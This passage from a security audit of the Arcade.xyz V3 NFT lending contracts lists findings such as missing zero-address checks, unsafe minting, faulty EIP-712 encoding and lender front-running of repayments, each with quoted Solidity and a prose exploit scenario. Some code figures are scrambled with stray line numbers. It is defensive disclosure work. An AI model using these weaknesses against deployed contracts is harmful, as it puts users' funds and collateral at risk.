AssetVault contract: callIncreaseAllowance and callDecreaseAllowance, which internally call SafeERC20.safeIncreaseAllowance and SafeERC20.safeDecreaseAllowance, respectively. Long term, when using external libraries/contracts, always ensure that they are being used correctly and that edge cases are explained in the documentation. 28 Arcade.xyz V3 Security Assessment +4. Risk of confusing events due to missing checks in whitelist contracts Severity: Low Difficulty: High Type: Data Validation Finding ID: TOB-ARCADE-4 Target: contracts/vault/CallWhitelist.sol, contracts/vault/CallWhitelistDelegation.sol Description The CallWhitelist contract’s add and remove functions do not check whether the given call has been registered in the whitelist. As a result, add could be used to register calls that have already been registered, and remove could be used to remove calls that have never been registered; these types of calls would still emit events. For example, invoking remove with a call that is not in the whitelist would emit a CallRemoved event even though no call was removed. 
Such an event could confuse off-chain monitoring systems, or at least make it more difficult to retrace what happened by looking at the emitted event. 64 65 66 67 function add(address callee, bytes4 selector) external override onlyOwner { whitelist[callee][selector] = true; emit CallAdded(msg.sender, callee, selector); } Figure 4.1: The add function in arcade-protocol/contracts/vault/CallWhitelist.sol 75 76 77 78 function remove(address callee, bytes4 selector) external override onlyOwner { whitelist[callee][selector] = false; emit CallRemoved(msg.sender, callee, selector); } Figure 4.2: The remove function in arcade-protocol/contracts/vault/CallWhitelist.sol A similar problem exists in the CallWhitelistDelegation.setRegistry function. This function can be called to set the registry address to the current registry address. In that case, the emitted RegistryChanged event would be confusing because nothing would have actually changed. 85 86 87 88 89 function setRegistry(address _registry) external onlyOwner { registry = IDelegationRegistry(_registry); emit RegistryChanged(msg.sender, _registry); } 29 Arcade.xyz V3 Security Assessment Figure 4.3: The setRegistry function in arcade-protocol/contracts/vault/CallWhitelistDelegation.sol Arcade has explained that the owner of the whitelist contracts in Arcade V3 will be a (set of) governance contract(s), so it is unlikely that this issue will happen. However, it is possible, and it could be prevented by more validation. Exploit Scenario No calls have yet been added to the whitelist in CallWhitelist. Through the governance system, a proposal to remove a call with the address 0x1 and the selector 0x12345678 is approved. The proposal is executed, and CallWhitelist.remove is called. The transaction succeeds, and a CallRemoved event is emitted, even though the “removed” call was never in the whitelist in the first place. Recommendations Short term, add validation to the add, remove, and setRegistry functions. For the add function, it should ensure that the given call is not already in the whitelist. For the remove function, it should ensure that the call is currently in the whitelist. For the setRegistry function, it should ensure that the new registry address is not the current registry address. Adding this validation will prevent confusing events from being emitted and ease the tracing of events in the whitelist over time. Long term, when dealing with function arguments, always ensure that all inputs are validated as tightly as possible and that the subsequent emitted events are meaningful. Additionally, consider setting up an off-chain monitoring system that will track important system events. Such a system will provide an overview of the events that occur in the contracts and will be useful when incidents occur. 30 Arcade.xyz V3 Security Assessment +5. Missing checks of _exists() return value Severity: Informational Difficulty: High Type: Data Validation Finding ID: TOB-ARCADE-5 Target: contracts/PromissoryNote.sol, contracts/vault/VaultFactory.sol Description The ERC-721 _exists() function returns a Boolean value that indicates whether a token with the specified tokenId exists. In two instances in Arcade’s codebase, the function is called but its return value is not checked, bypassing the intended result of the existence check. In particular, in the PromissoryNote.tokenURI() and VaultFactory.tokenURI() functions, _exists() is called before the URI for the tokenId is returned, but its return value is not checked. 
If the given NFT does not exist, the URI returned by the tokenURI() function will be incorrect, but this error will not be detected due to the missing return value check on _exists(). 165 function tokenURI(uint256 tokenId) public view override(INFTWithDescriptor, ERC721) returns (string memory) { 166 167 168 169 } _exists(tokenId); return descriptor.tokenURI(address(this), tokenId); Figure 5.1: The tokenURI function in arcade-protocol/contracts/PromissoryNote.sol 48 function tokenURI(address, uint256 tokenId) external view override returns (string memory) { 49 return bytes(baseURI).length > 0 ? string(abi.encodePacked(baseURI, tokenId.toString())) : ""; 50 } Figure 5.2: The tokenURI function in arcade-protocol/contracts/nft/BaseURIDescriptor.sol Exploit Scenario Bob, a developer of a front-end blockchain application that interacts with the Arcade contracts, develops a page that lists users' promissory notes and vaults with their respective URIs. He accidentally passes a nonexistent tokenId to tokenURI(), causing his application to show an incorrect or incomplete URI. 31 Arcade.xyz V3 Security Assessment Recommendations Short term, add a check for the _exists() function’s return value to both of the tokenURI() functions to prevent them from returning an incomplete URI for nonexistent tokens. Long term, add new test cases to verify the expected return values of tokenURI() in all contracts that use it, with valid and invalid tokens as arguments. 32 Arcade.xyz V3 Security Assessment +6. Incorrect deployers in integration tests Severity: Informational Difficulty: High Type: Testing Finding ID: TOB-ARCADE-6 Target: test/Integration.ts Description The fixture deployment function in the provided integration tests uses different signers for deploying the Arcade contracts before performing the tests. All Arcade contracts are meant to be deployed by the protocol team, except for vaults, which are deployed by users using the VaultFactory contract. However, in the fixture deployment function, some contracts are deployed from the borrower account instead of the admin account. Some examples are shown in figure 6.1; however, there are other instances in which contracts are not deployed from the admin account. const whitelist = await deploy("CallWhitelist", signers[0], const signers: SignerWithAddress[] = await ethers.getSigners(); const [borrower, lender, admin] = signers; 71 72 73 74 []); 75 76 77 signers[0], [BASE_URI]) 78 [vaultTemplate.address, whitelist.address, feeController.address, descriptor.address]); const vaultTemplate = await deploy("AssetVault", signers[0], []); const feeController = await deploy("FeeController", admin, []); const descriptor = await deploy("BaseURIDescriptor", const vaultFactory = await deploy("VaultFactory", signers[0], Figure 6.1: A snippet of the tests in arcade-protocol/test/Integration.ts Exploit Scenario Alice, a developer on the Arcade team, adds a new permissioned feature to the protocol. She adds the relevant integration tests for her feature, and all tests pass. However, because the deployer for the test contracts was not the admin account, those tests should have failed, and the contracts are deployed to the network with a bug. Recommendations Short term, correct all of the instances of incorrect deployers for the contracts in the integration tests file. 33 Arcade.xyz V3 Security Assessment Long term, add additional test cases to ensure that the account permissions in all deployed contracts are correct. 34 Arcade.xyz V3 Security Assessment +7. 
Risk of out-of-gas revert due to use of transfer() in claimFees Severity: Informational Difficulty: High Type: Undefined Behavior Finding ID: TOB-ARCADE-7 Target: contracts/vault/VaultFactory.sol Description The VaultFactory.claimFees function uses the low-level transfer() operation to move the collected ETH fees to another arbitrary address. The transfer() operation sends only 2,300 units of gas with this operation. As a result, if the recipient is a contract with logic inside the receive() function, which would use extra gas, the operation will probably (depending on the gas cost) fail due to an out-of-gas revert. 194 195 196 197 198 199 function claimFees(address to) external onlyRole(FEE_CLAIMER_ROLE) { uint256 balance = address(this).balance; payable(to).transfer(balance); emit ClaimFees(to, balance); } Figure 7.1: The claimFees function in arcade-protocol/contracts/vault/VaultFactory.sol The Arcade team has explained that the recipient will be a treasury contract with no logic inside the receive() function, meaning the current use of transfer() will not pose any problems. However, if at some point the recipient does contain logic inside the receive() function, then claimFees will likely revert and the contract will not be able to claim the funds. Note, however, that the fees could be claimed by another address (i.e., the fees will not be stuck). The withdrawETH function in the AssetVault contract uses Address.sendValue instead of transfer(). function withdrawETH(address to) external override onlyOwner 223 onlyWithdrawEnabled nonReentrant { 224 225 226 227 228 // perform transfer uint256 balance = address(this).balance; payable(to).sendValue(balance); emit WithdrawETH(msg.sender, to, balance); } 35 Arcade.xyz V3 Security Assessment Figure 7.2: The withdrawETH function in arcade-protocol/contracts/vault/AssetVault.sol Address.sendValue internally uses the call() operation, passing along all of the remaining gas, so this function could be a good candidate to replace use of transfer() in claimFees. However, doing so could introduce other risks like reentrancy attacks. Note that neither the withdrawETH function nor the claimFees function is currently at risk of reentrancy attacks. Exploit Scenario Alice, a developer on the Arcade team, deploys a new treasury contract that contains an updated receive() function that also writes the received ETH amount into a storage array in the treasury contract. Bob, whose account has the FEE_CLAIMER_ROLE role in the VaultFactory contract, calls claimFees with the newly deployed treasury contract as the recipient. The transaction fails because the write to storage exceeds the passed along 2,300 units of gas. Recommendations Short term, consider replacing the claimFees function’s use of transfer() with Address.sendValue; weigh the risk of possibly introducing vulnerabilities like reentrancy attacks against the benefit of being able to one day add logic in the fee recipient’s receive() function. If the decision is to have claimFees continue to use transfer(), update the NatSpec comments for the function so that readers will be aware of the 2,300 gas limit on the fee recipient. Long term, when deciding between using the low-level transfer() and call() operations, consider how malicious smart contracts may be able to exploit the lack of limits on the gas available in the recipient function. 
Additionally, consider the likelihood that the recipient will be a smart wallet or multisig (or other smart contract) with logic inside the receive() function, as the 2,300 gas from transfer() might not be sufficient for those recipients. 36 Arcade.xyz V3 Security Assessment +8. Risk of lost funds due to lack of zero-address check in functions Severity: Medium Difficulty: High Type: Data Validation Finding ID: TOB-ARCADE-8 Target: contracts/vault/VaultFactory.sol, contracts/RepaymentController.sol, contracts/LoanCore.sol Description The VaultFactory.claimFees (figure 8.1), RepaymentController.redeemNote (figure 8.2), LoanCore.withdraw, and LoanCore.withdrawProtocolFees functions are all missing a check to ensure that the to argument does not equal the zero address. As a result, these functions could transfer funds to the zero address. 194 195 196 197 198 199 function claimFees(address to) external onlyRole(FEE_CLAIMER_ROLE) { uint256 balance = address(this).balance; payable(to).transfer(balance); emit ClaimFees(to, balance); } Figure 8.1: The claimFees function in arcade-protocol/contracts/vault/VaultFactory.sol function redeemNote(uint256 loanId, address to) external override { LoanLibrary.LoanData memory data = loanCore.getLoan(loanId); (, uint256 amountOwed) = loanCore.getNoteReceipt(loanId); if (data.state != LoanLibrary.LoanState.Repaid) revert address lender = lenderNote.ownerOf(loanId); if (lender != msg.sender) revert RC_OnlyLender(lender, msg.sender); uint256 redeemFee = (amountOwed * feeController.get(FL_09)) / 126 127 128 129 130 RC_InvalidState(data.state); 131 132 133 134 BASIS_POINTS_DENOMINATOR; 135 136 137 } loanCore.redeemNote(loanId, redeemFee, to); Figure 8.2: The redeemNote function in arcade-protocol/contracts/RepaymentController.sol Exploit Scenario A script that is used to periodically withdraw the protocol fees (calling LoanCore.withdrawProtocolFees) is updated. Due to a mistake, the to argument is left 37 Arcade.xyz V3 Security Assessment uninitialized. The script is executed, and the to argument defaults to the zero address, causing withdrawProtocolFees to transfer the protocol fees to the zero address. Recommendations Short term, add a check to verify that to does not equal the zero address to the following functions: ● VaultFactory.claimFees ● RepaymentController.redeemNote ● LoanCore.withdraw ● LoanCore.withdrawProtocolFees Long term, use the Slither static analyzer to catch common issues such as this one. Consider integrating a Slither scan into the project’s CI pipeline, pre-commit hooks, or build scripts. 38 Arcade.xyz V3 Security Assessment +9. The maximum value for FL_09 is not set by FeeController Severity: Low Difficulty: High Type: Data Validation Finding ID: TOB-ARCADE-9 Target: contracts/FeeController.sol Description The FeeController constructor initializes all of the maximum values for the fees defined in the FeeLookups contract except for FL_09 (LENDER_REDEEM_FEE). Because the maximum value is not set, it is possible to set any amount, with no upper bound, for that particular fee. The lender's redeem fee is used in RepaymentController’s redeemNote function to calculate the fee paid by the lender to the protocol in order to receive their funds back. If the protocol team accidentally sets the fee to 100%, all of the users' funds to be redeemed would instead be used to pay the protocol. 
42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 constructor() { /// @dev Vault mint fee - gross maxFees[FL_01] = 1 ether; /// @dev Origination fees - bps maxFees[FL_02] = 10_00; maxFees[FL_03] = 10_00; /// @dev Rollover fees - bps maxFees[FL_04] = 20_00; maxFees[FL_05] = 20_00; /// @dev Loan closure fees - bps maxFees[FL_06] = 10_00; maxFees[FL_07] = 50_00; maxFees[FL_08] = 10_00; } Figure 9.1: The constructor in arcade-protocol/contracts/FeeController.sol function redeemNote(uint256 loanId, address to) external override { LoanLibrary.LoanData memory data = loanCore.getLoan(loanId); (, uint256 amountOwed) = loanCore.getNoteReceipt(loanId); 126 127 128 129 130 RC_InvalidState(data.state); 131 if (data.state != LoanLibrary.LoanState.Repaid) revert address lender = lenderNote.ownerOf(loanId); 39 Arcade.xyz V3 Security Assessment if (lender != msg.sender) revert RC_OnlyLender(lender, msg.sender); uint256 redeemFee = (amountOwed * feeController.get(FL_09)) / 132 133 134 BASIS_POINTS_DENOMINATOR; 135 136 137 } loanCore.redeemNote(loanId, redeemFee, to); Figure 9.2: The redeemNote function in arcade-protocol/contracts/RepaymentController.sol Exploit Scenario Charlie, a member of the Arcade protocol team, has access to the privileged account that can change the protocol fees. He wants to set LENDERS_REDEEM_FEE to 5%, but he accidentally types a 0 and sets it to 50%. Users can now lose half of their funds to the new protocol fee, causing distress and lack of trust in the team. Recommendations Short term, set a maximum boundary for the FL_09 fee in FeeController’s constructor. Long term, improve the test suite to ensure that all fee-changing functions test for out-of-bounds values for all fees, not just FL_02. 40 Arcade.xyz V3 Security Assessment +10. Fees can be changed while a loan is active Severity: Low Type: Timing Difficulty: High Finding ID: TOB-ARCADE-10 Target: contracts/FeeController.sol Description All fees in the protocol are calculated using the current fees, as informed by the FeeController contract. However, fees can be changed by the team at any time, so the effective rollover and closure fees that the users will pay can change once their loans are already initialized; therefore, these fees are impossible to know in advance. For example, in the code shown in figure 10.1, the LENDER_INTEREST_FEE and LENDER_PRINCIPAL_FEE values are read when a loan is about to be repaid, but these values can be different from the values the user agreed to when the loan was initialized. The same can happen in OriginationController and other functions in RepaymentController. 
function _prepareRepay(uint256 loanId) internal view returns (uint256 LoanLibrary.LoanData memory data = loanCore.getLoan(loanId); if (data.state == LoanLibrary.LoanState.DUMMY_DO_NOT_USE) revert if (data.state != LoanLibrary.LoanState.Active) revert 149 amountFromBorrower, uint256 amountToLender) { 150 151 RC_CannotDereference(loanId); 152 RC_InvalidState(data.state); 153 154 155 156 terms.proratedInterestRate); 157 158 BASIS_POINTS_DENOMINATOR; 159 BASIS_POINTS_DENOMINATOR; 160 161 162 163 } LoanLibrary.LoanTerms memory terms = data.terms; uint256 interest = getInterestAmount(terms.principal, uint256 interestFee = (interest * feeController.get(FL_07)) / uint256 principalFee = (terms.principal * feeController.get(FL_08)) / amountFromBorrower = terms.principal + interest; amountToLender = amountFromBorrower - interestFee - principalFee; Figure 10.1: The _prepareRepay function in arcade-protocol/contracts/RepaymentController.sol 41 Arcade.xyz V3 Security Assessment Exploit Scenario Lucy, the lender, and Bob, the borrower, agree on the current loan conditions and fees at a certain point in time. Some weeks later, when the time comes to repay the loan, they learn that the protocol team decided to change the fees while their loan was active. Lucy’s earnings are now different from what she expected. Recommendations Short term, consider storing (for example, in the LoanTerms structure) the fee values that both counterparties agree on when a loan is initialized, and use those local values for the full lifetime of the loan. Long term, document all of the conditions that are agreed on by the counterparties and that should be constant during the lifetime of the loan, and make sure they are preserved. Add a specific integration or fuzzing test for these conditions. 42 Arcade.xyz V3 Security Assessment +11. Asset vault nesting can lead to loss of assets Severity: Low Difficulty: High Type: Access Controls Finding ID: TOB-ARCADE-11 Target: contracts/vault/VaultFactory.sol, contracts/vault/AssetVault.sol Description Allowing asset vaults to be nested (e.g., vault A is owned by vault B, and vault B is owned by vault X, etc.) could result in a situation in which multiple asset vaults own each other. This would result in a deadlock preventing assets in the affected asset vaults from ever being withdrawn again. Asset vaults are designed to hold different types of assets, including ERC-721 tokens. The ownership of an asset vault is tracked by an accompanying ERC-721 token that is minted (figure 11.1) when the asset vault is deployed through the VaultFactory contract. 164 (uint256) { 165 166 167 mintFee); 168 169 170 171 172 173 mintFee); 174 175 176 177 } function initializeBundle(address to) external payable override returns uint256 mintFee = feeController.get(FL_01); if (msg.value < mintFee) revert VF_InsufficientMintFee(msg.value, address vault = _create(); _mint(to, uint256(uint160(vault))); emit VaultCreated(vault, to); return uint256(uint160(vault)); if (msg.value > mintFee) payable(msg.sender).transfer(msg.value - Figure 11.1: The initializeBundle function in arcade-protocol/contracts/vault/VaultFactory.sol To add an ERC-721 asset to an asset vault, it needs to be transferred to the asset vault’s address. Because the ownership of an asset vault is tracked by an ERC-721 token, it is possible to transfer the ownership of an asset vault to another asset vault by simply transferring the ERC-721 token representing vault ownership. 
To withdraw ERC-721 tokens from an asset vault, the owner (the holder of the asset vault’s ERC-721 token) needs to 43 Arcade.xyz V3 Security Assessment enable withdrawals (using the enableWithdraw function) and then call the withdrawERC721 (or withdrawBatch) function. 121 122 123 124 150 151 152 153 154 155 156 function enableWithdraw() external override onlyOwner onlyWithdrawDisabled { withdrawEnabled = true; emit WithdrawEnabled(msg.sender); } Figure 11.2: The enableWithdraw function in arcade-protocol/contracts/vault/AssetVault.sol function withdrawERC721( address token, uint256 tokenId, address to ) external override onlyOwner onlyWithdrawEnabled { _withdrawERC721(token, tokenId, to); } Figure 11.3: The withdrawERC721 function in arcade-protocol/contracts/vault/AssetVault.sol Only the owner of an asset vault can enable and perform withdrawals. Therefore, if two (or more) vaults own each other, it would be impossible for a user to enable or perform withdrawals on the affected vaults, permanently locking all assets (ERC-721, ERC-1155, ERC-20, ETH) within them. The severity of the issue depends on the UI, which was out of scope for this review. If the UI does not prevent vaults from owning each other, the severity of this issue is higher. In terms of likelihood, this issue would require a user to make a mistake (although a mistake that is far more likely than the transfer of tokens to a random address) and would require the UI to fail to detect and prevent or warn the user from making such a mistake. We therefore rated the difficulty of this issue as high. Exploit Scenario Alice decides to borrow USDC by putting up some of her NFTs as collateral: +1. Alice uses the UI to create an asset vault (vault A) and transfers five of her CryptoPunks to the asset vault. +2. The UI shows that Alice has another existing vault (vault X), which contains two Bored Apes. She wants to use these two vaults together to borrow a higher amount of USDC. She clicks on vault A and selects the “Add Asset” option. +3. The UI shows a list of assets that Alice owns, including the ERC-721 token that represents ownership of vault X. Alice clicks on “Add”, the transaction succeeds, and the vault X NFT is transferred to vault A. Vault X is now owned by vault A. 44 Arcade.xyz V3 Security Assessment +4. Alice decides to add another Bored Ape NFT that she owns to vault X. She opens the vault X page and clicks on “Add Assets”, and the list of assets that she can add shows the ERC-721 token that represents ownership of vault A. +5. Alice is confused and wonders if adding vault X to vault A worked (step 3). She decides to add vault A to vault X instead. The transaction succeeds, and now vault A owns vault X and vice versa. Alice is now unable to withdraw any of the assets from either vault. Recommendations Short term, take one of the following actions: ● Disallow the nesting of asset vaults. That is, prevent users from being able to transfer ownership of an asset vault to another asset vault. This would prevent the issue altogether. ● If allowing asset vaults to be nested is a desired feature, update the UI to prevent two or more asset vaults from owning each other (if it does not already do so). Also, update the documentation so that other integrating smart contract protocols are aware of the issue. Long term, when dealing with the nesting of assets, consider edge cases and write extensive tests that ensure these edge cases are handled correctly and that users do not lose access to their assets. 
+12. Risk of locked assets due to use of _mint instead of _safeMint
Severity: Medium
Difficulty: Low
Type: Undefined Behavior
Finding ID: TOB-ARCADE-12
Target: contracts/vault/VaultFactory.sol, contracts/PromissoryNote.sol

Description
The asset vault and promissory note ERC-721 tokens are minted via the _mint function rather than the _safeMint function. The _safeMint function includes a necessary safety check that validates a recipient contract's ability to receive and handle ERC-721 tokens. Without this safeguard, tokens can inadvertently be sent to an incompatible contract, causing them, and any assets they hold, to become irretrievable.

function initializeBundle(address to) external payable override returns (uint256) {
    uint256 mintFee = feeController.get(FL_01);

    if (msg.value < mintFee) revert VF_InsufficientMintFee(msg.value, mintFee);

    address vault = _create();

    _mint(to, uint256(uint160(vault)));

    emit VaultCreated(vault, to);

    if (msg.value > mintFee) payable(msg.sender).transfer(msg.value - mintFee);

    return uint256(uint160(vault));
}

Figure 12.1: The initializeBundle function in arcade-protocol/contracts/vault/VaultFactory.sol

function mint(address to, uint256 loanId) external override returns (uint256) {
    if (!hasRole(MINT_BURN_ROLE, msg.sender)) revert PN_MintingRole(msg.sender);

    _mint(to, loanId);

    return loanId;
}

Figure 12.2: The mint function in arcade-protocol/contracts/PromissoryNote.sol

The _safeMint function's built-in safety check ensures that the recipient contract has the necessary ERC721Receiver implementation, verifying the contract's ability to receive and manage ERC-721 tokens.

function _safeMint(
    address to,
    uint256 tokenId,
    bytes memory _data
) internal virtual {
    _mint(to, tokenId);
    require(
        _checkOnERC721Received(address(0), to, tokenId, _data),
        "ERC721: transfer to non ERC721Receiver implementer"
    );
}

Figure 12.3: The _safeMint function in openzeppelin-contracts/contracts/token/ERC721/ERC721.sol

The _checkOnERC721Received method invokes the onERC721Received method on the receiving contract, expecting a return value containing the bytes4 selector of the onERC721Received method. A successful pass of this check implies that the contract is indeed capable of receiving and processing ERC-721 tokens.

The _safeMint function does allow for reentrancy through the call to _checkOnERC721Received on the receiver of the token. However, based on the order of operations in the affected functions in Arcade (figures 12.1 and 12.2), this poses no risk.

Exploit Scenario
Alice initializes a new asset vault by invoking the initializeBundle function of the VaultFactory contract, passing in her smart contract wallet address as the to argument. She transfers her valuable CryptoPunks NFT, intended to be used as collateral, to the newly created asset vault. However, she later discovers that her smart contract wallet lacks support for ERC-721 tokens. As a result, both her asset vault token and the CryptoPunks NFT become irretrievable, stuck within her smart contract wallet due to the absence of a mechanism to handle ERC-721 tokens.

Recommendations
Short term, use the _safeMint function instead of _mint in the PromissoryNote and VaultFactory contracts. The _safeMint function includes vital checks that ensure the recipient is equipped to handle ERC-721 tokens, thus mitigating the risk that NFTs could become frozen.
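For illustration, the fix to figure 12.2 is a one-line change (a sketch, not necessarily the exact code the Arcade team shipped):

function mint(address to, uint256 loanId) external override returns (uint256) {
    if (!hasRole(MINT_BURN_ROLE, msg.sender)) revert PN_MintingRole(msg.sender);

    // _safeMint reverts unless `to` is an EOA or implements onERC721Received.
    _safeMint(to, loanId);

    return loanId;
}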
Long term, enhance the unit testing suite. These tests should encompass more negative paths and potential edge cases, which will help uncover hidden vulnerabilities or bugs like this one. Additionally, it is critical to test user-provided inputs extensively, covering a broad spectrum of potential scenarios. This rigorous testing will contribute to building a more secure, robust, and reliable system.

+13. Borrowers cannot realize full loan value without risking default
Severity: Medium
Difficulty: Low
Type: Timing
Finding ID: TOB-ARCADE-13
Target: contracts/LoanCore.sol

Description
To fully capitalize on their loans, borrowers need to retain their loaned assets, and the owed interest, for the entire term of their loans. However, if a borrower waits until the loan's maturity date to repay it, they become immediately vulnerable to liquidation of their collateral by the lender. As soon as the block.timestamp value exceeds the dueDate value, a lender can invoke the claim function to liquidate the borrower's collateral.

// First check if the call is being made after the due date.
uint256 dueDate = data.startDate + data.terms.durationSecs;
if (dueDate >= block.timestamp) revert LC_NotExpired(dueDate);

Figure 13.1: A snippet of the claim function in arcade-protocol/contracts/LoanCore.sol

Owing to the inherent nature of the blockchain, a borrower cannot precisely synchronize a repayment transaction with the moment block.timestamp reaches the dueDate. Moreover, repaying a loan before the dueDate forfeits some of the loan's inherent value because the protocol's interest assessment design does not refund any part of the interest for early repayment. Once block.timestamp is greater than dueDate, a lender can preempt a borrower's repayment attempt, invoke the claim function, and liquidate the borrower's collateral. Frequently, collateral is worth more than the loaned assets, giving lenders an incentive to do this.

Given the protocol's interest assessment design, the Arcade team should implement a grace period following the maturity date during which no additional interest is assessed beyond the period agreed to in the loan terms. This buffer would give the borrower an opportunity to fully capitalize on the term of their loan without the risk of defaulting and losing their collateral.

Exploit Scenario
Alice, a borrower, takes out a loan from Eve using Arcade's NFT lending protocol. Alice deposits her rare CryptoPunk as collateral, which is more valuable than the assets loaned to her, so her position is over-collateralized. Alice plans to hold on to the lent assets for the entire duration of the loan period in order to maximize her benefit-to-cost ratio. Eve, the lender, is monitoring the blockchain for the moment when block.timestamp exceeds the dueDate so that she can call the claim function and liquidate Alice's CryptoPunk. As soon as the loan term is up, Alice submits a transaction to the repay function, and Eve front-runs that transaction with her own call to the claim function. As a result, Eve is able to liquidate Alice's CryptoPunk collateral.

Recommendations
Short term, introduce a grace period after the loan's maturity date during which the lender cannot invoke the claim function. This buffer would give the borrower sufficient time to repay the loan without the risk of immediate collateral liquidation.
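A sketch of such a check inside claim follows; the constant's name and 10-minute value mirror the fix described in Appendix H, but the exact code is illustrative:

uint256 public constant GRACE_PERIOD = 10 minutes;

// Inside claim: the lender may claim only after the due date plus the
// grace period, giving the borrower a repayment window at maturity.
uint256 dueDate = data.startDate + data.terms.durationSecs;
if (block.timestamp <= dueDate + GRACE_PERIOD) revert LC_NotExpired(dueDate + GRACE_PERIOD);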
Long term, revise the protocol's interest assessment design to allow a portion of the interest to be refunded in cases of early repayment. This change could reduce the incentive for borrowers to delay repayment until the last possible moment. Additionally, provide better education for borrowers on how the lending protocol works, particularly around critical dates and actions, and improve communication channels for borrowers to raise concerns or seek clarification.

+14. itemPredicates encoded incorrectly according to EIP-712
Severity: Low
Difficulty: Low
Type: Configuration
Finding ID: TOB-ARCADE-14
Target: contracts/OriginationController.sol

Description
The itemPredicates parameter is not encoded correctly, so the signer cannot see the verifier address when signing. The verifier contract receives each batch of listed assets and checks them for correctness and existence, which is vital to ensuring the security and integrity of the lending transaction.

According to EIP-712, structured data should be hashed in conjunction with its typeHash. The following is the hashStruct function as defined in EIP-712:

hashStruct(s : 𝕊) = keccak256(typeHash ‖ encodeData(s))
where typeHash = keccak256(encodeType(typeOf(s)))

In the protocol, the recoverItemsSignature function hashes an array of Predicate[] structs that are passed in as the itemPredicates argument. The function encodes and hashes the array without adding the Predicate typeHash to each member of the array. The hashed output of that operation is then included in the _ITEMS_TYPEHASH definition as a bytes32 value, referred to as itemsHash.

(bytes32 sighash, address externalSigner) = recoverItemsSignature(
    loanTerms,
    sig,
    nonce,
    neededSide,
    keccak256(abi.encode(itemPredicates))
);

Figure 14.1: A snippet of the initializeLoanWithItems function in arcade-protocol/contracts/OriginationController.sol

// solhint-disable max-line-length
bytes32 private constant _ITEMS_TYPEHASH =
    keccak256(
        "LoanTermsWithItems(uint32 durationSecs,uint32 deadline,uint160 proratedInterestRate,uint256 principal,address collateralAddress,bytes32 itemsHash,address payableCurrency,bytes32 affiliateCode,uint160 nonce,uint8 side)"
    );

Figure 14.2: The _ITEMS_TYPEHASH variable in arcade-protocol/contracts/OriginationController.sol

However, this method of encoding an array of structs is not consistent with the EIP-712 guidelines, which stipulate the following:

"The array values are encoded as the keccak256 hash of the concatenated encodeData of their contents (i.e., the encoding of SomeType[5] is identical to that of a struct containing five members of type SomeType). The struct values are encoded recursively as hashStruct(value). This is undefined for cyclical data."

Therefore, the protocol should iterate over the itemPredicates array, encoding each Predicate instance separately with its respective typeHash.

Exploit Scenario
Alice creates a loan offering that takes CryptoPunks as collateral. She submits the loan terms to the Arcade protocol. Bob, a CryptoPunk holder, navigates the Arcade UI to accept Alice's loan terms. An EIP-712 signature request appears in MetaMask for Bob to sign. Bob cannot validate whether the message he is signing uses the CryptoPunk verifier contract because that information is not included in the hash.

Recommendations
Short term, adjust the encoding of itemPredicates to comply with the EIP-712 standard. Have the code iterate through the itemPredicates array and encode each Predicate instance separately with its associated typeHash. Additionally, refactor the _ITEMS_TYPEHASH variable so that the Predicate typeHash definition is appended to it, and replace the bytes32 itemsHash parameter with Predicate[] items. This revision will allow the signer to see the verifier address of the message they are signing, ensuring the validity of each batch of items, in addition to complying with the EIP-712 standard.
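A minimal sketch of such compliant encoding follows. It assumes a Predicate struct of (bytes data, address verifier); the helper name and exact typehash string are illustrative, not the shipped fix:

bytes32 private constant _PREDICATE_TYPEHASH =
    keccak256("Predicate(bytes data,address verifier)");

function _hashPredicates(LoanLibrary.Predicate[] memory predicates) internal pure returns (bytes32) {
    bytes32[] memory hashes = new bytes32[](predicates.length);
    for (uint256 i = 0; i < predicates.length; i++) {
        // Each struct is encoded as hashStruct(value), per EIP-712;
        // dynamic bytes members are themselves hashed before encoding.
        hashes[i] = keccak256(
            abi.encode(_PREDICATE_TYPEHASH, keccak256(predicates[i].data), predicates[i].verifier)
        );
    }
    // The array is encoded as the keccak256 hash of the concatenated hashes.
    return keccak256(abi.encodePacked(hashes));
}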
Long term, strictly adhere to established Ethereum standards such as EIP-712. These standards exist to ensure interoperability, security, and predictable behavior in the Ethereum ecosystem. Violating these norms can lead to unforeseen security vulnerabilities.

+15. The fee values can distort the incentives for the borrowers and lenders
Severity: Informational
Difficulty: High
Type: Data Validation
Finding ID: TOB-ARCADE-15
Target: contracts/FeeController.sol

Description
Arcade V3 contains nine fee settings. Six of these fees are to be paid by the lender, two are to be paid by the borrower, and the remaining fee is to be paid by the borrower if they decide to mint a new vault for their collateral. Depending on the values of these settings, the incentives can change for both loan counterparties.

For example, to create a new loan, both the borrower and lender have to pay origination fees, and eventually, the loan must be rolled over, repaid, or defaulted. In the first case, both the new lender and borrower pay rollover fees; note that the original lender pays no fees at all for closing the loan. In the second case, the lender pays interest fees and principal fees on closing the loan. Finally, if the loan is defaulted, the lender pays a default fee to liquidate the collateral.

The various fees paid based on the outcome of the loan can result in an interesting incentive game for investors in the protocol, depending on the actual values of the fee settings. If the lender rollover fee is cheaper than the origination fee, investors may be incentivized to roll over existing loans instead of creating new ones, benefiting the original lenders by saving them the closing fees and harming the borrowers by indirectly raising the interest rates to compensate. Similarly, if the lender rollover fees are higher than the closing fees, lenders will be less incentivized to roll over loans.
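As a purely hypothetical illustration (the percentages below are invented; the real values are configurable): suppose the lender origination fee is 2% of principal and the lender rollover fee is 0.5%. On a 100,000 USDC loan, originating a new loan costs a lender 2,000 USDC, while rolling over a maturing one costs the incoming lender only 500 USDC, and the outgoing lender avoids the interest and principal fees of a normal repayment entirely. Under such a configuration, rational lenders would compete to roll over existing loans rather than originate new ones, with borrowers ultimately bearing the difference through higher quoted interest rates.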
In summary, having such fine-grained control over the fee settings introduces hard-to-predict incentive scenarios that can scare users away or cause users who do not account for fees to inadvertently lose profits.

Recommendations
Short term, clearly inform borrowers and lenders of all of the existing fees and their current values at the moment a loan is opened, as well as the various possible outcomes, including the expected net profits if the loan is repaid, rolled over, defaulted, or redeemed.

Long term, add interactive ways for users to calculate their expected profits, such as a loan simulator.

+16. Malicious borrowers can use forceRepay to grief lenders
Severity: Medium
Difficulty: Low
Type: Data Validation
Finding ID: TOB-ARCADE-16
Target: contracts/RepaymentController.sol

Description
A malicious borrower can grief a lender by calling the forceRepay function instead of the repay function; doing so allows the borrower to pay less in gas fees while requiring the lender to perform a separate transaction to retrieve their funds (using the redeemNote function) and to pay a redeem fee.

